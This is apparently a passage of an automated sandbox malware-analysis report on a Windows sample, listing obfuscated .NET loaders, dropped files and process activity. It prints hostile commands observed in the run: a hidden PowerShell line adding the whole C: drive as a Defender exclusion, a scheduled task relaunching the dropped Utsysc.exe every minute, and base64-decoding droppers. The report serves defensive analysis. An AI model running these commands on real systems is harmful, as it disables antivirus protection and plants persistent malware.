Source: xwREqjHUEv.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wkernel32.pdb source: dialer.exe, 00000008.00000003.2107474129.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: dialer.exe, 00000008.00000003.2106681750.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2106830579.0000000005870000.00000004.00000001.00020000.00000000.sdmp, F324.exe, 00000017.00000003.2780142315.0000000003B00000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: dialer.exe, 00000008.00000003.2107068189.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2107215768.0000000005820000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: dialer.exe, 00000008.00000003.2106681750.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2106830579.0000000005870000.00000004.00000001.00020000.00000000.sdmp, F324.exe, 00000017.00000003.2780142315.0000000003B00000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dialer.exe, 00000008.00000003.2107068189.0000000005680000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000008.00000003.2107215768.0000000005820000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: dialer.exe, 00000008.00000003.2107474129.00000000057A0000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Source: 6.2.powershell.exe.8770000.2.raw.unpack, suSFEPEfDHGCWwn.cs .Net Code: sIeuMaGmXOmgxKA System.Reflection.Assembly.Load(byte[])
Source: 6.2.powershell.exe.8770000.2.raw.unpack, suSFEPEfDHGCWwn.cs .Net Code: sIeuMaGmXOmgxKA
Source: 13.3.OpenWith.exe.24aba862410.19.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.19.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.8.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.8.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.5.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.5.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.13.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.13.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.18.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.18.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.17.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.17.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.4.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.4.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.3.OpenWith.exe.24aba862410.3.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.3.OpenWith.exe.24aba862410.3.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 13.2.OpenWith.exe.24abaa39d60.3.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 13.2.OpenWith.exe.24abaa39d60.3.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0058FA0A LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 24_2_0058FA0A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0312B8BA push eax; ret 6_2_0312B8D9
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A4305 push F693B671h; retf 8_3_032A430A
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A3B74 pushad ; retf 8_3_032A3B83
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A21AF pushad ; ret 8_3_032A21B7
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A21EF push ecx; iretd 8_3_032A21FB
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A45FC push esi; ret 8_3_032A4600
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A4FC8 push es; ret 8_3_032A4FC9
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A0FCE push eax; retf 8_3_032A0FCF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A3E4E push edi; iretd 8_3_032A3E55
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A5CD2 push dword ptr [edx+ebp+3Bh]; retf 8_3_032A5CDF
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF9D1E push esi; retf 000Ah 13_3_00007DF488BF9D1F
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF4CA0 push edx; ret 13_3_00007DF488BF4CAB
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00402EE1 push 000000C3h; ret 19_2_00402FFC
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00402A47 push ebx; ret 19_2_00402A53
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00401503 push edi; ret 19_2_00401530
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00402A1F push ebx; ret 19_2_00402A22
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00402A2C push ebx; ret 19_2_00402A3E
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00402EE1 push 000000C3h; ret 22_2_00402FFC
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00402A47 push ebx; ret 22_2_00402A53
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00401503 push edi; ret 22_2_00401530
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00402A1F push ebx; ret 22_2_00402A22
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00402A2C push ebx; ret 22_2_00402A3E
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042CC52 push dword ptr [edx+ebp+3Bh]; retf 23_3_0042CC5F
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042AAF4 pushad ; retf 23_3_0042AB03
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042B285 push F693B671h; retf 23_3_0042B28A
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042BF48 push es; ret 23_3_0042BF49
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_00427F4E push eax; retf 23_3_00427F4F
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042916F push ecx; iretd 23_3_0042917B
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042B57C push esi; ret 23_3_0042B580
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042912F pushad ; ret 23_3_00429137
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042ADCE push edi; iretd 23_3_0042ADD5
Source: 6.2.powershell.exe.8770000.2.raw.unpack, BsUHkypsWGBuvLH.cs High entropy of concatenated method names: 'VYMWBhgTmEythIb', 'vQFEBYTcUOUFqmt', 'CToEiZJxvIbZmDc', 'ZXHZYNHEBrcEYMm', 'CKKGjDRMfOHgTSo', 'YstHpSuSdigsoFj', 'BuRJqPmLcVMKoFO', 'nfjeglafPUyKaaL', 'xKOmigbKYcQiLsn', 'RfTaXnvnrfnYwaE'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, mSWuDcVRcbwpWvV.cs High entropy of concatenated method names: 'jcjKlCpOBwXPGrq', 'RwMmGIDfYzGmVIu', 'vJrHXENLOZHYroV', 'IZgCFeHzHGEefNE', 'MXowRirpirfNPNg', 'TKXVthpiwVWzvLy', 'WtVIYVpuTzxCpUu', 'xuyyzcenndCffCw', 'QbNaCDDqVRUdnRS', 'eiKIMbREAtouPwX'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, hpJnQfTykNtfLMj.cs High entropy of concatenated method names: 'GlwGibkDeZviGIo', 'oZpTGhUhgcLNFKP', 'cDDdPfqxkIlUyTu', 'xPfEUXoRLgINwQP', 'GmZLLWpuzXtXPsn', 'ENdNZVolEsQSWWO', 'JzPUSftCTSYEPVT', 'sevPjRDCDimKqjn', 'fShyZtJAlBkdkSD', 'HHNrDTcsJulhGhV'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, JniPlOumMmudvXd.cs High entropy of concatenated method names: 'ykGNfuucBQPueDF', 'mnaxHOBmErmLRXp', 'WxzjxHJFHRsbHjY', 'AASEUoMhZhXoOJK', 'ZpeyQsIDOjJJUxe', 'GSBZIiKPtSseGxr', 'OHlzcqIvowPnMcI', 'fGRJDltGVAqDlqw', 'XlGrQJVCZWqATiM', 'tOSWcEwtZnuNxzI'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, ARSjvsSQqEbYieC.cs High entropy of concatenated method names: 'QYEhFvtAeUttQtz', 'TDoqQwrlzDmYggM', 'TURGUlrZAWMhOkh', 'eAsXeDnvzDlvGgx', 'dXiusMpqFeJuYYi', 'CevZaOMLolQiCBI', 'HVxZbfyyxUBCyaj', 'eDknevldZdsPZVP', 'xCczpxRLvoBTNnk', 'EQzmfqmZgRPDbcP'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, cMKsKRxcXKAbfDJ.cs High entropy of concatenated method names: 'kehJnqtIJTNNCIq', 'QcvnhEHkhwGKzIP', 'mPhdIPWYiaxDQFb', 'CpBsBBadgkjJjSe', 'CLOBXHBXDapxFeJ', 'eFUVhXuhvWkGwPk', 'kSlvvkdkwlycfLy', 'hPmAlSVBUzBksXO', 'RjHEDiqeZgrOlzZ', 'aJeIiRcnTfQmCvp'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, tMtFhWxcgNHuzQZ.cs High entropy of concatenated method names: 'vBPXGtOpcMPGhkv', 'ZAfVxprrstiDAhi', 'pnrsQEwrQRjMayL', 'BLIJXvlLxwvYXrj', 'APqAMmqAbCKxCKk', 'cXokwghWfwshLdX', 'JuphZnJSODuZoSE', 'uKeYmxrdDjAaIYc', 'PuxHJjvQfHYXxMx', 'WqHHUFdAPsMtBNa'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, cbjCBqVkWEkEoRV.cs High entropy of concatenated method names: 'GetCursorPos', 'IxmAMZjJSdYPQdO', 'nOJawHVQXOstjbM', 'NVGncQGJfrbvJhb', 'VqyZljoFpkCuEMv', 'WCwkObUqgEivAdK', 'rABMUQndGPwDnYL', 'pnjXHOaOfAjUloB', 'NYVhaJTQQwWTLRK', 'aYFHhXVndyADAhu'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, GRVRRORrwJzhHEc.cs High entropy of concatenated method names: 'OmFNlQAJAsrPczr', 'pODQLiaFjUzgYen', 'oUcyPOJcAbdjrtO', 'VsBZidvECTuKpyP', 'qBymGliSKlPTkiW', 'GEITdsMDseRFcVu', 'LuVZeKKREdoyGrk', 'sjBmTXkCrjzTfNl', 'bvYgkFwTXMRGpsb', 'ZmSvHDuzcgBwGwG'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, AEppClYhMHunVKn.cs High entropy of concatenated method names: 'oacOZqIdPfUrQAC', 'wGLsQAcEXtHCNkI', 'XWKGcoPnEgUofdT', 'FRWlIDwhClfUupF', 'ikEscbfdLwKVsBa', 'FcnJDuQBMeDwBGl', 'xlTpqhijxfIeuaB', 'HDWEgRdLPDxHoWu', 'TluMYEHptkzDaCi', 'WQmokMNcypUHtDq'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, suQlIulfxLdngWM.cs High entropy of concatenated method names: 'hZvklOoAqMQhzcP', 'rvWWHUDuYztDXHO', 'HANQuBpzatiRSSL', 'cJHZxuQvoYHlBlD', 'sEMvRYKtVQauYZw', 'mXRXfCZFUezvRBA', 'RWqCeCdAttyVmnd', 'QYoUNcEOXyalicA', 'DNFkcZgSaAoptMA', 'YSZeuNfxzbCvLXu'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, hBvvnBJKIlXWBXy.cs High entropy of concatenated method names: 'lnKfXQimHspJeUf', 'pJZifmyjznrmMBI', 'VwHtWYkwmlJpRLc', 'ABwlCHZjbmrfWZf', 'hdWSkItfIUflJBS', 'MetAFOIEoWWakDM', 'xJzyHBsJwEcBnKQ', 'USpnZNalvLnyspr', 'jCvZjJLAlCnblJk', 'umLibkDSFiYdQjl'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, ufngmSGDZwfHwge.cs High entropy of concatenated method names: 'fdDeGqZIZFjDDSK', 'thVGwPVCCaZdWyT', 'MdOCgvUGLNcLAkA', 'KRzHHLFGfQObtyJ', 'ZAAqsAlehvwWzsp', 'yWKVCDgpkvOviYT', 'PPeWxaLdpmwCOCD', 'ozMzfyQMbtiBqdZ', 'mBTCywqOXEDQkGj', 'oQxKGhhofcLqIrn'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, ykFNpNVFSsxwfKN.cs High entropy of concatenated method names: 'NLHkQbkDziyERBE', 'uZqdXhCEMOMnbDj', 'UniIkEmAnwJmNmP', 'CNNXouJWUKUNfeK', 'vPifoaxWJgKbMYk', 'xkuxOEfAqkRXFkJ', 'VkxWjZgOJfEJOuL', 'mZCPOhajBkZOalK', 'hlpFseGyfeAxKjB', 'tmJXCnYUsgaeUIx'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, sZlykIkDrkkJaWP.cs High entropy of concatenated method names: 'UveBzrYnfyoXSaH', 'SUWizOcXYUTIPOR', 'uCOhTBNIGxkzdJB', 'JnIwUvnjFkqrxZD', 'tUxHnwrhoGBEDJc', 'TIOLqVuqmHYBJyS', 'SyPunspsSHogPYY', 'nnfaoalOLaImheH', 'iyjLUAAokxDlcxq', 'irKSsJCWKGXVpBL'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, mNVkqEoZqiXrIXE.cs High entropy of concatenated method names: 'TVaVnEGHRcwdcxs', 'ObOCwKgjJDExwAp', 'clCxwKWLLlunUrF', 'KsIKHIZVxPkbtaf', 'tsyWaBeJjwzZpbU', 'GctFVsdWAeXYDuz', 'RIpaqWfkFcFNHvx', 'nshdMOjdEdBgbpD', 'QtBzpMgeiiNxnlz', 'JGxaMHecAqTHsbM'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, GnKtotZwsUdWRRo.cs High entropy of concatenated method names: 'oWGPeZqKUeuzvyN', 'HDyChpnwWoaAtXE', 'YGfyJBvdrttVkxb', 'KGoVNKFIgTDecKf', 'hTggjmhOkRuJflR', 'KJZZljxwbsbZfJJ', 'YzaAGkjFzhwWVLf', 'SJvYTbzfCYktHHp', 'SlZsPnaxrEotpKa', 'VaDEGzTPsCOknrQ'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, xIIqIMBxriRQXnp.cs High entropy of concatenated method names: 'jhBFAxIbmcnbbft', 'KQlGMXQIeTsGbPa', 'RrLgbTVThyeyWlc', 'nQaqDrKSTKrCmtA', 'XZcvKNXfhlsAtqO', 'kjBunSZrjnnDjVQ', 'LgqKBIyzDwuIGwQ', 'ieMebHMZUIWpUYm', 'QIKJOQvcVJEUzIa', 'wdGmrNfKJWchZmk'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, LnzKEPtGGkvcIcb.cs High entropy of concatenated method names: 'qCLzRnavlbnHxuJ', 'ImEnwVcHNuGoMpI', 'lzhNJhBoDcFQmUG', 'rpHWzhBseLSVkGl', 'hgjukPIPUYXffNo', 'bCtHdmlpWVMwjnX', 'oGnJxUlYjBoWQbi', 'PMxzgFIZpDoaSQf', 'SvNrmcZRucVlgin', 'jcyzktNadCgmftw'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, KjGZUfNGuuKHwwK.cs High entropy of concatenated method names: 'eZBDKEReoCFRYcd', 'HQhKbvUAsTzaOEL', 'nmOZMDlaHNEdIHF', 'sbyypsJSCpmgUaj', 'ATwSUdeJSNbkhtU', 'lACboSjCFGDcOzM', 'jRxBcahGFBvryPX', 'DcbuWmeNXmguiPL', 'NTFvxTPEtlsuhqw', 'RlxdYMpnRsXzdgJ'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, VSncezFRucQcjPE.cs High entropy of concatenated method names: 'yPuXogeURApaHzo', 'GqovXKqfQaCALYZ', 'NkdbjNvXpAYvniR', 'kEdrJyEMQuTmaud', 'ajqWPeXoqhkbvqB', 'NdHAUkwDeyVtvEL', 'GftVUHTuWRUlJqg', 'MPFcrqAakDegTSL', 'POgJEEfgypixWuw', 'UXbgnQzKNGiGvgW'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, suSFEPEfDHGCWwn.cs High entropy of concatenated method names: 'iAVCbjGdVjtbZfz', 'KqlzulZGPhynhvh', 'wNlkZzzBFGNKcDR', 'ezOFSZybkBgzbVr', 'VTitJsWvyApDyws', 'GqrcgUZCEBtkPdV', 'sIeuMaGmXOmgxKA', 'VocUqljRIOWEdlc', 'EKOhMopDpsyjOdi', 'DiPPJMqvZnuYeYP'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, VQpdloRJILctnjH.cs High entropy of concatenated method names: 'JctTueOjaMnaANc', 'NQvffUJUJnQhjfS', 'ovREgJRPpbnLXYd', 'ZhxzSGtIjKVOnlm', 'ypVoCGNXGWQnWfe', 'hfKLLgszignRHoe', 'cWKXplcKTygRClS', 'GUhPDQHjytOKEeg', 'AJDIsLknhCvHdZR', 'IybCtEHwlVSycWF'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, bJsEsMEAYBxWKLa.cs High entropy of concatenated method names: 'FegCPTyTDXXRKsb', 'vtAjniymigdqpgU', 'XAJrhHfvqESiIVX', 'bSsBqPecsHzJgBK', 'PoiutTLUHqVbakn', 'aXbVUtPKQZbFnTs', 'dMWdxtmwgsxZtpK', 'sodhvPjJWypMyQT', 'SHWwAJvMtvCktbb', 'WhgARUNZvtgavsL'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, SYsdSZUYhJtMPsR.cs High entropy of concatenated method names: 'NsFrqywfwGuphuP', 'kmdRVvavxEGZsAS', 'MrsyfbUarsCqcxp', 'eVWmfajMCiqdtfi', 'uzLjNhTqSOZHEnZ', 'lYpxorRKSBkMnpx', 'lgNPdARHziafDxm', 'JyqpPDyXMwSimbq', 'pdqeZcoOhiNQQxM', 'BwXBHprICNTAhgH'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, ZLwJbWmHOiRftRt.cs High entropy of concatenated method names: 'FWCbJglLoFAImdk', 'lNqiYzfWGGuNscw', 'SrJMyTPtYpYDGJN', 'uEnEYMUvAiAbgLf', 'kZUbvTPBkALbCHK', 'IUxQxaGFPLMlyui', 'ZZeCrqemJjdpLTa', 'wRtFlmHvCrcTtDU', 'qtfvnLvGhnhFxGf', 'PCdsAjoyPILJTyn'
Source: C:\Windows\explorer.exe File created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP2810.tmp (copy)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gfiecjd
Source: C:\Users\user\AppData\Local\Temp\F557.exe File created: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F557.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Roaming\D4C0.vmt.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F324.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe" /F

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\gfiecjd:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
